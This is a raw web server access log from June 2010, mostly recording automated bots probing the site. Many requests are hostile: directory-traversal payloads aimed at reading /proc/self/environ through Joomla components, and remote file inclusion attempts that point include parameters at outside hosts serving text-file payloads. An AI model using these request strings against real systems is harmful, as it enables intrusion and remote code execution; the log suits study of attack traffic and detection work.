207.7.108.203 - - [02/Jun/2010:00:01:44 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
207.7.108.203 - - [02/Jun/2010:00:01:44 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
61.135.134.108 - - [02/Jun/2010:00:01:45 -0500] "GET /logs//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7929 "-""libwww-perl/5.79"
59.42.10.71 - - [02/Jun/2010:00:02:00 -0500] "GET /logs/access_log.1274832000//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.831"
59.42.10.71 - - [02/Jun/2010:00:02:01 -0500] "GET //?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.831"
59.42.10.71 - - [02/Jun/2010:00:02:02 -0500] "GET /logs//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 7929 "-""libwww-perl/5.831"
207.7.108.203 - - [02/Jun/2010:00:02:10 -0500] "GET /logs/access_log.1274572800//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
207.7.108.203 - - [02/Jun/2010:00:02:10 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
207.7.108.203 - - [02/Jun/2010:00:02:11 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
203.169.165.24 - - [02/Jun/2010:00:02:15 -0500] "GET /logs//index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.65"
203.169.165.24 - - [02/Jun/2010:00:02:15 -0500] "GET //index.php?option=com_juliaportfolio&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.65"
218.50.54.236 - - [02/Jun/2010:00:08:22 -0500] "GET /logs/access_log.1274832000//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.832"
218.50.54.236 - - [02/Jun/2010:00:08:22 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
218.50.54.236 - - [02/Jun/2010:00:08:23 -0500] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.832"
218.50.54.236 - - [02/Jun/2010:00:08:23 -0500] "GET /logs/access_log.1274832000//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.832"
218.50.54.236 - - [02/Jun/2010:00:08:24 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
218.50.54.236 - - [02/Jun/2010:00:08:24 -0500] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.832"
218.50.54.236 - - [02/Jun/2010:00:08:30 -0500] "GET /logs/access_log.1274832000//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.832"
218.50.54.236 - - [02/Jun/2010:00:08:31 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.832"
218.50.54.236 - - [02/Jun/2010:00:08:31 -0500] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.832"
91.121.180.195 - - [02/Jun/2010:00:09:24 -0500] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
91.121.201.191 - - [02/Jun/2010:00:09:24 -0500] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
91.121.180.195 - - [02/Jun/2010:00:09:24 -0500] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
91.121.201.191 - - [02/Jun/2010:00:09:24 -0500] "GET //index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
67.195.112.180 - - [02/Jun/2010:00:10:05 -0500] "GET /logs/access_log.1160697600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
59.42.10.71 - - [02/Jun/2010:00:10:20 -0500] "GET /logs/access_log.1273363200//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.831"
61.135.134.108 - - [02/Jun/2010:00:11:44 -0500] "GET /logs/access_log.1273363200//?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.79"
207.46.199.185 - - [02/Jun/2010:00:14:33 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
74.81.68.114 - - [02/Jun/2010:00:18:19 -0500] "GET /logs//index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
74.81.68.114 - - [02/Jun/2010:00:18:19 -0500] "GET //index.php?option=com_jeformcr&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
84.40.30.37 - - [02/Jun/2010:00:20:31 -0500] "GET /logs/?INCLUDE_FOLDER=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 7924 "-""Mozilla/5.0"
84.40.30.37 - - [02/Jun/2010:00:20:31 -0500] "GET /logs/access_log.1271548800/?INCLUDE_FOLDER=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
84.40.30.37 - - [02/Jun/2010:00:20:31 -0500] "GET /?INCLUDE_FOLDER=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
84.40.30.37 - - [02/Jun/2010:00:22:54 -0500] "GET /?INCLUDE_FOLDER=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
84.40.30.37 - - [02/Jun/2010:00:22:54 -0500] "GET /logs/access_log.1271548800/?INCLUDE_FOLDER=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
84.40.30.37 - - [02/Jun/2010:00:22:54 -0500] "GET /logs/?INCLUDE_FOLDER=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 7924 "-""Mozilla/5.0"
84.40.30.37 - - [02/Jun/2010:00:23:29 -0500] "GET /logs/access_log.1272067200/?INCLUDE_FOLDER=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
84.40.30.37 - - [02/Jun/2010:00:23:39 -0500] "GET /logs/access_log.1271980800/?INCLUDE_FOLDER=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
216.129.119.43 - - [02/Jun/2010:00:24:26 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 200 3254 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
67.195.112.180 - - [02/Jun/2010:00:24:38 -0500] "GET /logs/access_log.1236297600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
84.40.30.37 - - [02/Jun/2010:00:24:53 -0500] "GET /logs/access_log.1272067200/?INCLUDE_FOLDER=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
72.52.242.210 - - [02/Jun/2010:00:24:57 -0500] "GET /classes/adodbt/sql.php?classes_dir=http://207.210.125.213/~theworld/main/info//USER.txt??? HTTP/1.1" 404 306 "-""libwww-perl/5.833"
72.52.242.210 - - [02/Jun/2010:00:24:57 -0500] "GET /logs/classes/adodbt/sql.php?classes_dir=http://207.210.125.213/~theworld/main/info//USER.txt??? HTTP/1.1" 404 311 "-""libwww-perl/5.833"
84.40.30.37 - - [02/Jun/2010:00:25:01 -0500] "GET /logs/access_log.1271980800/?INCLUDE_FOLDER=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
74.81.68.114 - - [02/Jun/2010:00:26:49 -0500] "GET /logs//index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
74.81.68.114 - - [02/Jun/2010:00:26:49 -0500] "GET //index.php?option=com_userstatus&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
174.121.217.207 - - [02/Jun/2010:00:27:40 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
216.129.119.43 - - [02/Jun/2010:00:31:59 -0500] "GET /tattoo/ HTTP/1.1" 200 466 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
209.44.120.2 - - [02/Jun/2010:00:32:24 -0500] "GET /index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
64.251.10.117 - - [02/Jun/2010:00:32:30 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
64.251.10.117 - - [02/Jun/2010:00:32:30 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
64.251.10.117 - - [02/Jun/2010:00:32:30 -0500] "GET /logs/index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
64.251.10.117 - - [02/Jun/2010:00:32:30 -0500] "GET /index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
207.7.108.203 - - [02/Jun/2010:00:33:14 -0500] "GET /logs//index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
207.7.108.203 - - [02/Jun/2010:00:33:14 -0500] "GET //index.php?option=com_jvehicles&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
125.248.150.84 - - [02/Jun/2010:00:34:28 -0500] "GET /logs//script_popup.php?dir=http://www.kangnung.org//zb//Ckrid1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
125.248.150.84 - - [02/Jun/2010:00:34:28 -0500] "GET //script_popup.php?dir=http://www.kangnung.org//zb//Ckrid1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
125.248.150.84 - - [02/Jun/2010:00:34:28 -0500] "GET /logs/access_log.1272412800//script_popup.php?dir=http://www.kangnung.org//zb//Ckrid1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
67.195.112.180 - - [02/Jun/2010:00:37:18 -0500] "GET /logs/access_log.1237593600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
204.15.39.12 - - [02/Jun/2010:00:37:42 -0500] "HEAD /logs/ HTTP/1.1" 200 0 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [02/Jun/2010:00:37:42 -0500] "GET /logs/ HTTP/1.1" 200 7924 "-""Botslist Botfinder (+http://www.botslist.ca)"
67.195.112.180 - - [02/Jun/2010:00:37:55 -0500] "GET /logs/access_log.1162080000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
204.15.39.12 - - [02/Jun/2010:00:38:37 -0500] "HEAD /logs/access_log.1270512000 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [02/Jun/2010:00:38:38 -0500] "HEAD /logs/access_log.1270598400 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [02/Jun/2010:00:38:38 -0500] "HEAD /logs/access_log.1270684800 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [02/Jun/2010:00:38:38 -0500] "HEAD /logs/access_log.1270771200 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [02/Jun/2010:00:38:38 -0500] "HEAD /logs/access_log.1270857600 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [02/Jun/2010:00:38:39 -0500] "HEAD /logs/access_log.1270944000 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [02/Jun/2010:00:38:39 -0500] "HEAD /logs/access_log.1271030400 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [02/Jun/2010:00:38:39 -0500] "HEAD /logs/access_log.1271116800 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [02/Jun/2010:00:38:39 -0500] "HEAD /logs/access_log.1271203200 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [02/Jun/2010:00:38:40 -0500] "HEAD /logs/access_log.1271289600 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [02/Jun/2010:00:38:40 -0500] "HEAD /logs/access_log.1271376000 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [02/Jun/2010:00:38:40 -0500] "HEAD /logs/access_log.1271462400 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [02/Jun/2010:00:38:41 -0500] "HEAD /logs/access_log.1271548800 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [02/Jun/2010:00:38:41 -0500] "HEAD /logs/access_log.1271635200 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [02/Jun/2010:00:38:41 -0500] "HEAD /logs/access_log.1271721600 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [02/Jun/2010:00:38:41 -0500] "HEAD /logs/access_log.1271808000 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [02/Jun/2010:00:38:42 -0500] "HEAD /logs/access_log.1271894400 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [02/Jun/2010:00:38:42 -0500] "HEAD /logs/access_log.1271980800 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [02/Jun/2010:00:38:42 -0500] "HEAD /logs/access_log.1272067200 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [02/Jun/2010:00:38:43 -0500] "HEAD /logs/access_log.1272153600 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [02/Jun/2010:00:38:43 -0500] "HEAD /logs/access_log.1272240000 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [02/Jun/2010:00:38:43 -0500] "HEAD /logs/access_log.1272326400 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [02/Jun/2010:00:38:43 -0500] "HEAD /logs/access_log.1272412800 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [02/Jun/2010:00:38:44 -0500] "HEAD /logs/access_log.1272499200 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [02/Jun/2010:00:38:44 -0500] "HEAD /logs/access_log.1272585600 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [02/Jun/2010:00:38:44 -0500] "HEAD /logs/access_log.1272672000 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [02/Jun/2010:00:38:45 -0500] "HEAD /logs/access_log.1272758400 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [02/Jun/2010:00:38:45 -0500] "HEAD /logs/access_log.1272931200 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [02/Jun/2010:00:38:45 -0500] "HEAD /logs/access_log.1273017600 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [02/Jun/2010:00:38:45 -0500] "HEAD /logs/access_log.1273104000 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [02/Jun/2010:00:38:46 -0500] "HEAD /logs/access_log.1273190400 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [02/Jun/2010:00:38:46 -0500] "HEAD /logs/access_log.1273276800 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [02/Jun/2010:00:38:46 -0500] "HEAD /logs/access_log.1273363200 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [02/Jun/2010:00:38:46 -0500] "HEAD /logs/access_log.1273449600 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [02/Jun/2010:00:38:47 -0500] "HEAD /logs/access_log.1273536000 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [02/Jun/2010:00:38:47 -0500] "HEAD /logs/access_log.1273622400 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [02/Jun/2010:00:38:47 -0500] "HEAD /logs/access_log.1273708800 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [02/Jun/2010:00:38:48 -0500] "HEAD /logs/access_log.1273795200 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [02/Jun/2010:00:38:48 -0500] "HEAD /logs/access_log.1273881600 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [02/Jun/2010:00:38:48 -0500] "HEAD /logs/access_log.1273968000 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [02/Jun/2010:00:38:48 -0500] "HEAD /logs/access_log.1274054400 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [02/Jun/2010:00:38:49 -0500] "HEAD /logs/access_log.1274140800 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [02/Jun/2010:00:38:49 -0500] "HEAD /logs/access_log.1274227200 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [02/Jun/2010:00:38:49 -0500] "HEAD /logs/access_log.1274313600 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [02/Jun/2010:00:38:49 -0500] "HEAD /logs/access_log.1274400000 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [02/Jun/2010:00:38:50 -0500] "HEAD /logs/access_log.1274486400 HTTP/1.1" 304 - "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [02/Jun/2010:00:38:50 -0500] "HEAD /logs/access_log.1274572800 HTTP/1.1" 206 0 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [02/Jun/2010:00:38:52 -0500] "GET /logs/access_log.1274572800 HTTP/1.1" 206 835120 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [02/Jun/2010:00:38:52 -0500] "HEAD /logs/access_log.1274659200 HTTP/1.1" 206 0 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [02/Jun/2010:00:38:55 -0500] "GET /logs/access_log.1274659200 HTTP/1.1" 206 983818 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [02/Jun/2010:00:38:55 -0500] "HEAD /logs/access_log.1274745600 HTTP/1.1" 206 0 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [02/Jun/2010:00:38:57 -0500] "GET /logs/access_log.1274745600 HTTP/1.1" 206 679778 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [02/Jun/2010:00:38:57 -0500] "HEAD /logs/access_log.1274832000 HTTP/1.1" 206 0 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [02/Jun/2010:00:38:59 -0500] "GET /logs/access_log.1274832000 HTTP/1.1" 206 738114 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [02/Jun/2010:00:38:59 -0500] "HEAD /logs/access_log.1274918400 HTTP/1.1" 206 0 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [02/Jun/2010:00:39:01 -0500] "GET /logs/access_log.1274918400 HTTP/1.1" 206 921295 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [02/Jun/2010:00:39:02 -0500] "HEAD /logs/access_log.1275004800 HTTP/1.1" 206 0 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [02/Jun/2010:00:39:04 -0500] "GET /logs/access_log.1275004800 HTTP/1.1" 206 862165 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [02/Jun/2010:00:39:04 -0500] "HEAD /logs/access_log.1275091200 HTTP/1.1" 206 0 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [02/Jun/2010:00:39:06 -0500] "GET /logs/access_log.1275091200 HTTP/1.1" 206 889369 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [02/Jun/2010:00:39:06 -0500] "HEAD /logs/access_log.1275177600 HTTP/1.1" 206 0 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [02/Jun/2010:00:39:10 -0500] "GET /logs/access_log.1275177600 HTTP/1.1" 206 870367 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [02/Jun/2010:00:39:10 -0500] "HEAD /logs/access_log.1275264000 HTTP/1.1" 206 0 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [02/Jun/2010:00:39:12 -0500] "GET /logs/access_log.1275264000 HTTP/1.1" 206 799173 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [02/Jun/2010:00:39:13 -0500] "HEAD /logs/access_log.1275350400 HTTP/1.1" 206 0 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [02/Jun/2010:00:39:15 -0500] "GET /logs/access_log.1275350400 HTTP/1.1" 206 907870 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [02/Jun/2010:00:39:15 -0500] "HEAD /logs/access_log.1275436800 HTTP/1.1" 206 0 "-""Botslist Botfinder (+http://www.botslist.ca)"
204.15.39.12 - - [02/Jun/2010:00:39:16 -0500] "GET /logs/access_log.1275436800 HTTP/1.1" 206 171761 "-""Botslist Botfinder (+http://www.botslist.ca)"
121.190.102.21 - - [02/Jun/2010:00:43:09 -0500] "GET /logs/send_reminders.php?includedir=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
121.190.102.21 - - [02/Jun/2010:00:43:09 -0500] "GET /send_reminders.php?includedir=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
121.190.102.21 - - [02/Jun/2010:00:43:09 -0500] "GET /logs/access_log.1262563200/send_reminders.php?includedir=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
121.190.102.21 - - [02/Jun/2010:00:43:09 -0500] "GET /logs/access_log.1272326400/send_reminders.php?includedir=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
121.190.102.21 - - [02/Jun/2010:00:44:16 -0500] "GET /send_reminders.php?includedir=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
121.190.102.21 - - [02/Jun/2010:00:44:16 -0500] "GET /logs/access_log.1262563200/send_reminders.php?includedir=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
121.190.102.21 - - [02/Jun/2010:00:44:16 -0500] "GET /logs/access_log.1272326400/send_reminders.php?includedir=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 329 "-""Mozilla/5.0"
121.190.102.21 - - [02/Jun/2010:00:44:16 -0500] "GET /logs/send_reminders.php?includedir=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 307 "-""Mozilla/5.0"
174.121.217.207 - - [02/Jun/2010:00:45:18 -0500] "GET /logs/access_log.1274832000//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
174.121.217.207 - - [02/Jun/2010:00:45:18 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
174.121.217.207 - - [02/Jun/2010:00:45:18 -0500] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
209.131.38.43 - - [02/Jun/2010:00:46:46 -0500] "GET / HTTP/1.1" 200 1003 "-""-"
209.131.38.43 - - [02/Jun/2010:00:46:46 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""-"
174.121.217.207 - - [02/Jun/2010:00:47:39 -0500] "GET /logs/access_log.1274832000//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
174.121.217.207 - - [02/Jun/2010:00:47:39 -0500] "GET //index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
174.121.217.207 - - [02/Jun/2010:00:47:39 -0500] "GET /logs//index.php?option=com_g2bridge&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
74.55.135.18 - - [02/Jun/2010:00:48:08 -0500] "GET /logs/access_log.1271894400//inc/download_center_lite.inc.php?script_root=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
74.55.135.18 - - [02/Jun/2010:00:48:08 -0500] "GET //inc/download_center_lite.inc.php?script_root=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
74.55.135.18 - - [02/Jun/2010:00:48:08 -0500] "GET /logs//inc/download_center_lite.inc.php?script_root=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
